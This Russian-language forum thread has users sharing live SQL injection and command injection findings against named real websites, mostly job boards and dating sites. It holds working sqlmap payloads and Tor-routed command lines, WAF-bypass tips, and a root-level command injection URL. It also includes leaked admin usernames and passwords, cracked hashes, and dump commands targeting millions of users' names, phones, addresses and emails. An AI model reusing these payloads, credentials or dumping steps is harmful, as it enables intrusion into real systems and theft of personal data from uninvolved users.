Найденные интересеные SQL inj & XSS

Xrenovi4 · 20.12.2018

Общая тема для публикации найденных вами sql inj и xss.

Собственно начну топик

Parameter: Prod (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: Prod=1016 AND 4992 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4992=4992) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)))&ProdName=IntelliFlex Platforms
---

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ColdFusion, Microsoft IIS 7.5, JSP
back-end DBMS: Microsoft SQL Server 2012

available databases [5]:
[*] info
[*] master
[*] model
[*] msdb
[*] tempdb

Xrenovi4 · 20.12.2018

Ваф не дал возможности получить имя субд

Parameter: page (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: itemsPerPage=24&page=-8997 OR 5440=5440&sortBy=best&typeahead=vta-no-cat-images-no-flyout-with-prim-cat book-case &words=book case

web application technology: Apache
back-end DBMS: MySQL 8 (MariaDB fork)

current user is DBA: True

Desoxyn · 20.12.2018

Xrenovi4 сказал(а):

///// Ваф не дал возможности получить имя субд ////

The site https://www.westelm.com is behind a ModSecurity (OWASP CRS)
Generic Detection results:
The site https://www.westelm.com seems to be behind a WAF or some sort of security solution
Reason: The server returned a different response code when a string trigged the blacklist.

Пробуй --tamper=modsecurityversioned или modsecurityzeroversioned
Так же можно совместить с space2comment и\или randomcase

Xrenovi4 · 20.12.2018

Уже пробовал)

Desoxyn сказал(а):

The site https://www.westelm.com is behind a ModSecurity (OWASP CRS)
Generic Detection results:
The site https://www.westelm.com seems to be behind a WAF or some sort of security solution
Reason: The server returned a different response code when a string trigged the blacklist.

Пробуй --tamper=modsecurityversioned или modsecurityzeroversioned
Так же можно совместить с space2comment и\или randomcase

Desoxyn · 20.12.2018

Плохо пробовал, стандартный модсек это примитив, там могут быть свои допилы или модсек наложен чтоб сбить с толку поверх других вафов, так же пробуй посылать POST вместо гет, так же есть такие варианты как X-Forwarded-For + X-Ordinating-IP + X-Remote-IP + X-Remote-Addr + X-Client-IP-headers указать локальный 127.0.0.1 или ip доверенного хоста (прокси клауда или инкапсулы к примеру) или если пробивается через шодан, ценсис вью-днс и прочие, то headers Host указать имя хоста а по IP обращаться напрямую (X указывать так же ip хоста, hostname отсылать только dn)

BabaDook · 21.12.2018

Думал для конкурсной статьи оставить, но статьи не будет.
https://networking.ringofsaturn.com/search.php?ul=networking.ringofsaturn.com&q=123|uname -a%26
Команд инъекция+ миссконфог сервера.
уязвимое поле поисковик, и неправельная настройка сервера позволяет получить максимальные права
https://networking.ringofsaturn.com...ingofsaturn.com&q=123|sudo -u root -i whoami&

Desoxyn · 22.12.2018

"Думал для конкурсной статьи оставить" так и надо было! Подобное актуально вполне. Бабдруг, ты себя недооцениваешь. Флудить-вот не твое. А в теме разибраешься вполне. Я бы поддержал лично твою кандидатуру. И в ctf ты себя неплохо показываешь. Зря ты так...

BabaDook · 22.12.2018

Очередную говностатью писать не хочу, хватает и без меня. Для того что бы что-то норм написать к сожалению времени нету. К другому конкурсу обязательно подготовлюсь лучше

BabaDook · 27.01.2019

http://мфц-новоорск.рф/service_overview?id=130 UnIoN SeLEcT 1,2,3,concat(user_hash),5,6,7,8,9,10,11,12,13,14,15 from users

BabaDook · 31.01.2019

https://jira.softlist.ua/

admin\admin ckexfqyj

Desoxyn · 31.01.2019

Код:

POST /invar/search.php HTTP/1.1
Host: loveme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060629 Firefox/1.5.0.4
Connection: close
Referer: http://loveme.com/invar/search.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
Cookie: cslhVISITOR=565f175eed5f83f5912f71fb80458776; LTJUID=WpacoK3AE4MAACGXyNwAAAAl; LASTLTJUID=WpacoK3AE4MAACGXyNwAAAAl; ECDATE=LORuFQayLp40ab9bJauaZA%3D%3D; UASTR=9CWclTZWVYczqDBNmd25YyuajCDL%2BvVszPRROTLgN8R95SQVmwJ7Y1ARS4dEchCCPXuwiNwFva0oXyCu7q7yP30jR29mSsCAhHTPWo2xQv7rkg1AsXnoEw%3D%3D; FERRA=onCoJZVozhDim3jzyI6niWP0%2BhiTdK4o; TERRA=onCoJZVozhDim3jzyI6niWP0%2BhiTdK4o; FLAND=onCoJZVozhDim3jzyI6niY8dcA89332wZtDflnJXlcg%3D; LLAND=onCoJZVozhDim3jzyI6niY8dcA89332wZtDflnJXlcg%3D; FVDATE=vwez2XhSPE5HizyCp9%2Bo2w%3D%3D; LVDATE=vwez2XhSPE5HizyCp9%2Bo2w%3D%3D; STRING=deleted; NEWSTRING=deleted; _uvc=7151981993679575%3Aa0cfe1611a8e0dfc1393dcd5b5c41cdd%3A1519819936%3A; client=John@example.com&John Jacobson&John Jacobson&666&Winterville&WI&36310&US; PHPSESSID=f0086cf0cf626a02d4c71de5404aa72a; file=4edeb34af21c1cbd4dbea22d4141b5df1519820006

weight_min=75&age_begin=18&height_ft_min=%22--%3e'--%3e%60--%3eMAGIC<!--#exec cmd="ls -la" -->MAGIC'&weight_max=145&height_ft_max=6&wpp=7&page=1&submit=Next&age_last=45

Desoxyn · 31.01.2019

POST /events/ HTTP/1.1
Host: www.relatieplanet.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060629 Firefox/1.5.0.4
Connection: close
Referer: https://www.relatieplanet.nl/events/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: .RP_SESSION=ksfw1hcxf5mzgufjqpvxtkw5; RP_COOKIE=Xzwe0MvAGgcfR3Siwk4unerdix7SJZKxP17RsZUnzP6TCX8+uurQma1qiEKs9vDwUHVeDOxW3ivb8Cr6U4afa8zz/tIG6VqA/NPnD0LFO9XvNp9PjvbXLADLnt0C3aZcbG21VBqAFDWZl4g5xv6+KaV4py/GzFyGdqKerQ+0pbq5aiqtbTB5qBeeovZIChuu; RP_EVENTS=Xzwe0MvAGgcfR3Siwk4unerdix7SJZKxP17RsZUnzP6df1brD4zMN+R6IxbHp+y2e4z9nrsg5sHEFJV/VLbOH17rWFh/dtfVn19z5+MlaFf0ZS5APl2++8J+EcxthywoFHc+HFOa/zt72wYWXIqIuoH3jsHvWohxJM4p4yUWmSAy/H4pliC4ATBDQ3+VUpIZ; RPSessionId=s1|WmiZU

sortDescending=False&EventsResultatenViewModel.Paging.CurrentPage=1&sortKey=*

Хостнэйм RLP-SQL1.
current database: 'relatieplanet'

Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: sortDescending=False&EventsResultatenViewModel.Paging.CurrentPage=1&sortKey=(SELECT (CASE WHEN (9828=9828) THEN 9828 ELSE 9828*(SELECT 9828 UNION ALL SELECT 6309) END))
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: Apache, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012

database management system users [2]:
[*] RLP-SQL1\\WWW-relatieplanet
[*] sa

-r путь:/relatie --batch --level=5 --risk=3 --dbms="Microsoft SQL Server 2012"

Database: relatieplanet
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.SysteemMails | 37819608|
| dbo.Profiel_Favorieten | 4985794 |
| dbo.Profielen | 1461863 |
| dbo.AffiliateHit | 1343976 |
| dbo.AffiliatePublishers | 1178246 |
| dbo.ProfielfotoPath | 1135846 |
| dbo.ProfielFotos | 1135843 |
| dbo.ProfielBlokkades | 891581 |
| db

ptivoUpdates | 876153 |
| dbo.Profiel_Abonnementen | 618550 |
| dbo.Betalingen | 489479 |
| dbo.LoginPogingen | 355449 |
| dbo.MatchMailHistory | 299247 |
| dbo.Flirts | 281116 |
| dbo.AffiliatePublisherProfiel | 221223 |
| db

nlineStatistieken | 212906 |
| dbo.Betaallinks | 168922 |
| dbo.AdyenPaymentResponses | 162987 |
| dbo.PotentialFlirts_1 | 157252 |
| dbo.PotentialFlirts_2 | 157251 |
| dbo.EspOptivo | 143242 |
| dbo.IpRanges | 100623 |
| dbo.MatchMailMatches | 66014 |
| dbo.PotentialFlirts_test | 65425 |
| dbo._profilersignalr | 57590 |
| dbo.AdyenNotifications | 36284 |
| dbo._BACKUP_Bounces | 27979 |
| dbo.Kortingscodes_Uitgegeven | 22181 |
| db

authRefreshTokens | 18839 |
| dbo.FullMembers | 16721 |
| dbo.[_listRecipients_30-05-2017] | 13733 |
| dbo.IncassoDossiers | 13002 |
| dbo.BULK_OptivoBounces | 12889 |
| dbo.Profielen_ResetKeys | 12677 |
| dbo.Postcodegebieden | 6766 |
| dbo.Kortingscodes | 5327 |
| dbo.Bounces | 5067 |
| dbo.EventDeelnemers | 4536 |
| dbo._tmg_Postcodetabel | 4044 |
| dbo.Kortingscodes_Profielen | 2772 |
| dbo.Gebruikers_Log | 1016 |
| dbo.BlacklistItems | 753 |
| dbo.Abonnementen_Websites | 466 |
| dbo.Layouts | 385 |
| dbo.MatchMailQueue | 382 |
| dbo.Krabbels | 279 |
| dbo.LayoutContents | 247 |
| dbo.Landen | 241 |
| dbo.Abonnementen | 236 |
| dbo.BULK_OptivoUpdates | 215 |
| dbo.Inzets | 209 |
| dbo.Inzet_Html | 186 |
| dbo.Teksten | 148 |
| dbo.Gebruikers | 130 |
| dbo.BlogItems | 103 |
| dbo.Emailtemplates | 78 |
| dbo.__MigrationHistory | 65 |
| dbo.Events | 63 |
| dbo.EventPhotos | 52 |
| dbo.EmailadresBlokkades | 45 |
| dbo.FooterMenuItems | 38 |
| dbo.FaqVragen | 31 |
| dbo.FaqCategorien | 25 |
| dbo.Betaalmethodes | 24 |
| dbo.Answers | 19 |
| dbo.PageHeaderTopMenuItems | 19 |
| db

pleidingsniveaus | 17 |
| dbo.CarrouselItems | 16 |
| dbo.Carrousels | 16 |
| dbo.Affiliates | 11 |
| dbo.Banners | 11 |
| dbo.ProfielFotoVerwijderRedenen | 11 |
| dbo.LayoutTemplateRows | 10 |
| dbo.Inzet_SinglesFotos | 8 |
| dbo.Inzet_Usps | 6 |
| dbo.PageHeaders | 6 |
| dbo.sysdiagrams | 6 |
| dbo.EventTestimonials | 5 |
| dbo.HeaderImages | 5 |
| dbo.IncentiveQueue | 5 |
| dbo.Inzet_Quotes | 5 |
| dbo.Inzet_Events | 4 |
| dbo.Inzet_Kortingscode | 4 |
| dbo.Footers | 3 |
| dbo.Inzet_Visuals | 3 |
| dbo.Gebruikers_ResetKeys | 2 |
| dbo.Websites | 2 |
| dbo.Inzet_Statistiek | 1 |
| dbo.LayoutTemplates | 1 |
| db

authClients | 1 |
+----------------------------------+---------+

4 ляма в общем.

Desoxyn · 31.01.2019

-u https://www.knuz.nl/search.php?s_geslacht=1&s_land=147&s_provincie=10&s_zoeknaar=2&s_leeftijdlaag=26&s_leeftijdhoog=36&idx=0 -p "s_land,s_provincie" --leve
l=5 --risk=3 --batch --dbms="MySQL"

web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache, PHP 5.3.3, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.5.0
comment injection fingerprint: MySQL 5.5.46
banner parsing fingerprint: MySQL 5.5.46, logging enabled
banner: '5.5.46-0+deb6u1-log'

current user: 'kdbuser@195.242.99.22_'
current database: 'knuz'
hostname: 'dl385'

python sqlmap.py --tor --tor-port=9150 --tor-type=SOCKS5 --check-tor --threads=200 --time-sec=15 --random-agent -v 3 --sqlmap-shell

Выборка через --sql-shell : SELECT password FROM user WHERE email LIKE 'knuz_28642%'

https://www.knuz.nl/admin/index.php админка

Акк под скан
irinaforlove@gmail.com:5856

available databases [4]:
[*] information_schema
[*] knuz +
[*] knuz_archief +
[*] websessions +

Database: websessions
+-----------+---------+
| Table | Entries |
+-----------+---------+
| knuz_sess | 259 |
+-----------+---------+
------------------------------

Database: knuz_archief
+----------------+---------+
| Table | Entries |
+----------------+---------+
| t_mail2013_txt | 3606865 |
| t_mail2015_txt | 3307373 |
| t_mail2014_txt | 3282891 |
| t_mail2013_dat | 3073033 |
| t_mail2015_dat | 2979561 |
| t_mail2014_dat | 2879358 |
| t_mail2009_txt | 2676757 |
| t_mail2009_dat | 2676755 |
| t_mail2008_txt | 1810497 |
| t_mail2008_dat | 1810486 |
+----------------+---------+
-----------------------------------

Database: knuz
[35 tables] Entries
+--------------------------------+
| t_mail_all_txt | 37572825 | +
| t_mail_all_dat | 36307806 |
| photomatch | 27936035 | +
| t_mail_txt | 6497025 |
| t_mail_dat | 6496994 |
| guestbook | 4703912 |
| chat_message | 2727763 |
| interest | 1893842 |
| ban | 1408970 | +
| `user` | 580430 | +
| wall | 208755 |
| chat | 185792 |
| betaalcodes | 167097 |
| credit_transactions | 137125 | +
| credit_balance | 85480 |
| credit_ideal_t | 18009 |
| fb_users | 14723 |
| misbruik | 13862 |
| metasearch | 8972 |
| lichtkrant | 7991 |
| bloemen_bezorgd | 3015 |
| blockip | 2825 |
| prikbord | 1949 |
| waarbenik | 525 |
| cms_content | 90 | +
| cms_page | 74 |
| iptable | 15 |
| bloemen | 11 |
| cms_lang | 4 |
| cms_site | 2 | +
| meldingen | 2 |
| cms_indexes | 1 |
| profile_extra | 17710 | +
| profile_general | 579071 | +
| profvisit2 | ? | +
--------------------------------+

+==========================================+
Database: knuz
Table: cms_site
[4 columns]
+--------------+--------------------+
| Column | Type |
+--------------+--------------------+
| default_lang | bigint(8) unsigned |
| id | bigint(8) unsigned |
| lang_support | varchar(50) |
| name | varchar(50) |
+--------------+--------------------+

+==========================================+

Database: knuz
Table: user
[64 columns]
+-------------------+------------------------------+
| Column | Type |
+-------------------+------------------------------+
| accountstatus | tinyint(3) unsigned |
| agecheck | tinyint(4) |
| agreecond | tinyint(3) unsigned |
| anonphone | varchar(20) |
| autologin | tinyint(3) unsigned |
| becamemember | datetime |
| chatstatus | tinyint(1) unsigned zerofill |
| checkmail | tinyint(1) |
| city | varchar(255) |
| country | tinyint(3) unsigned |
| dateofbirth | datetime |
| email | varchar(50) |
| facebook | varchar(40) |
| favorites | longtext |
| feest | tinyint(4) |
| firstname | varchar(255) |
| fotoa | tinyint(4) |
| fotoreview | tinyint(1) |
| guest | tinyint(4) |
| homep | tinyint(4) |
| hyves | varchar(40) |
| id | bigint(8) unsigned |
| ipad | varchar(20) |
| lastaction | datetime |
| lastchanges | datetime |
| lastlogin | datetime |
| lastname | varchar(255) |
| lastsearch | text |
| lat | varchar(8) |
| login | varchar(50) |
| logout | tinyint(3) |
| lon | varchar(8) |
| mailing | tinyint(1) |
| mailnewm | tinyint(1) |
| mobile | varchar(20) |
| mobile_device | varchar(25) |
| mobile_lastaction | datetime |
| mobile_lat | varchar(8) |
| mobile_lon | varchar(8) |
| mobile_pushtoken | text |
| nickname | varchar(50) |
| nofake | tinyint(4) |
| optinok | tinyint(1) |
| password | varchar(50) |
| payedlast | datetime |
| picup | bigint(8) |
| rd_x | smallint(6) |
| rd_y | smallint(6) |
| review | tinyint(1) |
| score | tinyint(4) |
| searchpref | longtext |
| sessionidrm | char(50) |
| sex | tinyint(3) unsigned |
| showbirth | tinyint(4) |
| showonline | tinyint(4) |
| snelmenu | tinyint(4) |
| state | tinyint(3) unsigned |
| stats | tinyint(4) |
| street | varchar(255) |
| telephone | varchar(20) |
| twitter | varchar(40) |
| wallban | tinyint(1) |
| wijkcode | smallint(4) |
| zipcode | char(10) |
+-------------------+------------------------------+

+===================================================+

Database: knuz
Table: profile_general
[59 columns]
+--------------------+---------------------+
| Column | Type |
+--------------------+---------------------+
| alcohol | tinyint(3) unsigned |
| bar | tinyint(3) unsigned |
| books | text |
| build | tinyint(3) unsigned |
| children | tinyint(3) unsigned |
| cinema | tinyint(3) unsigned |
| clothingstyleday | tinyint(3) unsigned |
| clothingstylenight | tinyint(3) unsigned |
| concerts | tinyint(3) unsigned |
| dancing | tinyint(3) unsigned |
| education | tinyint(3) unsigned |
| eyecolour | tinyint(3) unsigned |
| food | text |
| haircolour | tinyint(3) unsigned |
| hairkind | tinyint(3) unsigned |
| hairlength | tinyint(3) unsigned |
| haspict | tinyint(3) unsigned |
| height | tinyint(3) unsigned |
| higherage | tinyint(3) unsigned |
| hobbies | text |
| housing | tinyint(3) unsigned |
| id | bigint(8) unsigned |
| idealdate | text |
| karakter | text |
| languages | varchar(255) |
| likepets | tinyint(3) unsigned |
| lookingfor | tinyint(3) unsigned |
| lowerage | tinyint(3) unsigned |
| mailpref | tinyint(4) |
| married | tinyint(3) unsigned |
| message | text |
| movies | text |
| music | text |
| occupation | varchar(255) |
| pets | tinyint(3) unsigned |
| picture | tinyint(3) |
| picup | bigint(8) |
| rateprof | tinyint(4) |
| reactprof | tinyint(4) |
| relationkind | tinyint(3) unsigned |
| religion | tinyint(3) unsigned |
| sexualpref | tinyint(3) unsigned |
| skincolour | tinyint(3) unsigned |
| smoke | tinyint(3) unsigned |
| specialpos | tinyint(4) |
| sport | tinyint(3) unsigned |
| sports | text |
| television | tinyint(3) unsigned |
| televisionprograms | text |
| theater | tinyint(3) unsigned |
| user_id | bigint(8) unsigned |
| vacation | text |
| visible | tinyint(3) unsig |
| wantchildren | tinyint(3) unsigned |
| weight | tinyint(3) unsigned |
| youtube1 | varchar(160) |
| youtube2 | varchar(160) |
| youtube3 | varchar(160) |
| youtube4 | varchar(160) |
+--------------------+---------------------+

+===========================================+

Database: knuz
Table: profile_extra
[10 columns]
+------------+--------------------+
| Column | Type |
+------------+--------------------+
| chat_id | varchar(255) |
| doagecheck | tinyint(4) |
| dohome | tinyint(4) |
| dophoto | tinyint(4) |
| dosnelmenu | tinyint(4) |
| homepage | longtext |
| id | bigint(8) unsigned |
| photoalbum | longtext |
| publichome | tinyint(4) |
| user_id | bigint(8) unsigned |
+------------+--------------------+

+===========================================+

Database: knuz
Table: profvisit2
[4 columns]
+------------+-----------+
| Column | Type |
+------------+-----------+
| count | bigint(8) |
| added | timestamp |
| clicker_id | bigint(8) |
| prof_id | bigint(8) |
+------------+-----------+

+===========================================+

Database: knuz
Table: ban
[3 columns]
+-----------+--------------------+
| Column | Type |
+-----------+--------------------+
| banned_id | bigint(8) |
| id | bigint(8) unsigned |
| maker_id | bigint(8) |
+-----------+--------------------+

+===========================================+

Database: knuz
Table: photomatch
[6 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| match | int(10) unsigned |
| Datumtijd | timestamp |
| id | int(10) unsigned |
| mailed | tinyint(1) |
| matched | tinyint(1) |
| uid | int(10) unsigned |
+-----------+------------------+

+===========================================+

Database: knuz
Table: cms_content
[5 columns]
+---------+--------------------+
| Column | Type |
+---------+--------------------+
| id | bigint(8) unsigned |
| lang_id | bigint(8) unsigned |
| page_id | bigint(8) unsigned |
| title | varchar(255) |
| txt | longtext |
+---------+--------------------+

+===========================================+

Database: knuz
Table: t_mail_all_txt
[2 columns]
+--------+--------------------+
| Column | Type |
+--------+--------------------+
| body | text |
| id | bigint(8) unsigned |
+--------+--------------------+

+===========================================+

Database: knuz
Table: credit_transactions
[6 columns]
+--------+------------------+
| Column | Type |
+--------+------------------+
| action | varchar(255) |
| date | datetime |
| amount | int(11) |
| id | int(10) unsigned |
| note | text |
| uid | int(10) unsigned |
+--------+------------------+

Desoxyn · 31.01.2019

IIS Web Core 7.5

http://ecfriend.com/cmslogin.asp

python sqlmap.py --tor --tor-port=9150 --tor-type=SOCKS5 --check-tor --threads=200 --time-sec=15 --random-agent -v 3 --sqlmap-shell

-r C:/Users/WRK/Desktop/ecfr -p "StoryType" --dbms="Microsoft SQL Server" -o --level=5 --risk=3 --batch --tamper=percentage

---
Parameter: StoryType (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: SimpleAgeFrom=&SimpleAgeTo=&StoryType=1 AND 2819=2819&PageAjaxed=<|
12/13/2011 16:55:37|
Vector: AND [INFERENCE]

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: SimpleAgeFrom=&SimpleAgeTo=&StoryType=1 OR 7392=(SELECT COUNT(*) FR
OM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers
AS sys5,sysusers AS sys6,sysusers AS sys7)&PageAjaxed=<|12/13/2011 16:55:37|
Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sys
users AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys
5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)

[22:31:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Apache, ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008

hostname: 'DB4\ECF'
current user is DBA: False

Тоже с системы 2 ляма почти.

Desoxyn · 31.01.2019

Сдох чтоли тоже? =(

http://www.tease.com.au/search_resu...3a,Password)+from+Admins+limit+0,1),1,1))=117

http://www.tease.com.au/search_result.php?p_per_page=10&gallery_view=0&State[]=2-4,5,6,7+AND+1=2
jme

http://www.tease.com.au/search_result.php?p_per_page=10&gallery_view=0&State[]=2-4,5,6,7+AND+1=1
DontHavOne

admin

3aseme
http://www.tease.com.au/admin/

http://www.tease.com.au/phpinfo.php
http://www.tease.com.au/stats/

Desoxyn · 31.01.2019

Джобов еще накину, ну те как обычно где заказчик отморозился.

Desoxyn · 31.01.2019

www.hoteljob-deutschland *******

Мап

Джумла

http://www.hoteljob-deutschland.de/...* from (select(sleep(20)))a)-- &suchen=Suchen первая

http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen вторая

Третяя
GET /index.job.php?option=com_jobportal&id=20768&seo=Chef%20de%20Rang%20(m/f)%20-%205*%20European%20Cruise%20Line.. HTTP/1.1
Host: www.hoteljob-deutschland.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'+(select * from (select(sleep(20)))a)+'
Connection: close

_______________________________________________
Админка

http://www.hoteljob-deutschland.de/administrator/

Database: db476799021
Table: jos_jp_admin
[3 entries]
+-----+----------+----------+-------------+
| EID | partner | username | passwort |
+-----+----------+----------+-------------+
| 1 | <blank> | admin | cindy1 |
| 2 | robinson | admin | robinson800 |
| 3 | tui | admin | tui |
+-----+----------+----------+-------------+

В АДМИНКУ НЕ ПРОХОДЯТ!
________________________________________________
-u http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen -p "filter%5Brang%5D%5B%5D" --risk=3 --dbs --dbms=MySQL --batch -v 3

-u http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen --tables -v 3 --batch --columns

-u http://www.hoteljob-deutschland.de/...ilter[bis]=all&filter[rang][]=1&suchen=Suchen -D db476799021 -T jos_jp_bewerber -C name,vorname,telefon,geburtsdatum,email,passwort --dump

Desoxyn · 31.01.2019

Все со скьюлмапом смотрите, я ж пометки сделал.

Desoxyn · 31.01.2019

http://www.trabajos.com/

https://www.trabajos.com/admin/ админка

Попробовать на всех риски

/ofertasporemail/alta/?idc=12&area=144155133'%20or%20'404'%3d'404&profesion=2&pais=100&provincia=122 !!!

/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS='%2b(select%20*%20from%20(select(sleep(20)))a)%2b'&desde=10 !!!

'5.0.51a-24+lenny5-log'
current user: 'trabajos2007@192.168.20.%'
current database: 'trabajos2007'
hostname: 'hvm143v'
current user is DBA: False
available databases [7]:
[*] information_schema
[*] test
[*] trabajos2007
[*] trabajos2007_openjobs
[*] trabajos2007_sao
[*] trabajos2007_soporte
[*] trabajos2007_termometro_stat

database management system users privileges:
[*] %trabajos2007% [1]:
privilege: USAGE

+----------------+---------+
| Table | Entries |
+----------------+---------+
| B027_CANDIDATO | 3289756 |

B001_USUARIO: '3291988'

T001_USUARIO '1593947'

http://www.trabajos.com/ofertas-int...rom+information_schema.tables))a)+'&desde=101 в опере, если руками проверять на табл нэйм

---------------------------------------
sqlmap-shell> -u https://www.trabajos.com/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS=1&desde=10 --dbms=MySQL -p "PAIS" -v 3 --no-cast? (вроде не надо уже) --tamper="modsecurityversioned" Раскручивать с ней!

---------------------------------------
По дампу юзеров

Тут вся инфа на юзеров, кроме пасса

D:\sqlmap-v-1\sqlmap.py --tor --tor-port=9150 --tor-type=SOCKS5 --check-tor --threads=250 --time-sec=50 --random-agent --sqlmap-shell

select concat_ws(0x3a,T027_NOMBRE,T027_APELLIDOS,T027_TELEFONO1,T027_POBLACION,T027_DIRECCION,T027_CODPOSTAL,T027_FECHA_NACIMIENTO,T027_EMAIL) from B027_CANDIDATO where T027_IDCANDIDATO=1193999911

имя фамилия телефон деревня адрес посталкод доб мыло

-u https://www.trabajos.com/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS=1&desde=10 -T T027_CANDIDATO -C T027_NOMBRE,T027_APELLIDOS,T027_TELEFONO1,T027_POBLACION,T027_DIRECCION,T027_CODPOSTAL,T027_FECHA_NACIMIENTO,T027_EMAIL -D trabajos2007 --dump --tamper="modsecurityversioned" --start=1000000 --stop=1400000

____________________

Тут мыло+хэш

concat_ws(0x3a,T001_IDUSUARIO,T001_NICK,T001_CODCR) from trabajos2007.B001_USUARIO

sqlmap-shell> -u http://www.trabajos.com/ofertas-internacionales/?PALABRACLAVE=&AREA=&PAIS=1&desde=10 -T B001_USUARIO -C T001_IDUSUARIO,T001_NICK,T001_CODCR -D trabajos2007 --start=1 --stop=1000000 --dump --tamper="modsecurityversioned"

---------------------

http://www.trabajos.com/ofertas-int...4+from+B027_CANDIDATO+limit+174,1--+&desde=10
select count(*) from T027_CANDIDATO: '1392209'

Щас 1.5. ляма.

Desoxyn · 31.01.2019

Убивайте

Админка
http://www.franco-jobs.com/ADMIN/

хз что
http://www.franco-jobs.com/bandwidth

-u http://www.franco-jobs.com/index.php?mod=search&search=1&employer=809 -p "employer" --dbms=MySQL 5.0.12 -v 3 --level=3 --technique=BEUSQ --tamper="modsecurityversioned"

web application technology: Apache
back-end DBMS: MySQL 5.5.42-37.1-log

database
[*] francoj1_francojobs

table: v3_admin_users
1::administrator::e99a18c428cb38d5f260853678922e03:: пароль abc123

table: websiteadmin_admin_users
1::administrator::0bb4caae84493ded659e9c8b5c2e1fcd:: пароль 2012pass
3::laurent::c28e039ce056c77d510b8c9281afc7bf
4::administrator2::e99a18c428cb38d5f260853678922e03:: пароль abc123
5::radu_admin::eb2b3ec262f1124d223c6aa2e6323c6f

http://www.franco-jobs.com/index.ph...FROM*/+/*!30183INFORMATION_SCHEMA.COLUMNS*/--

Выводит всех на страницу в сурс

http://www.franco-jobs.com/index.ph...ROM*/+/*!30183websiteadmin_ext_jobseekers*/--

Найденные интересеные SQL inj & XSS

Скидди

Скидди

mind-bender

Скидди

mind-bender

(L1) cache

mind-bender

(L1) cache

(L1) cache

(L1) cache

mind-bender

mind-bender

mind-bender

mind-bender

mind-bender

mind-bender

mind-bender

mind-bender

mind-bender

mind-bender